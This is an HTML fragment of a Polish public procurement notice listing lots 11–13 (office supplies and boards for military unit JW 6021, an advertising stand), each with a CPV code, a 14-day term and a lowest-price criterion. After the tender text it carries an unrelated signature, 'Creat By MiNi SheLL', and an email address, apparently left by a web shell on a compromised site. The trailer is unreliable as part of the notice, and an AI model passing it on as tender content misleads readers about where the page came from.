<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Artykuły biurowe II dla JW. 6021.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1k) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Stojak Reklamowy dla BRWP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1l) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.34.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dostawa tablic dla JW. Nr 6021.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis w Załączniku Nr 1ł) do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.50.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com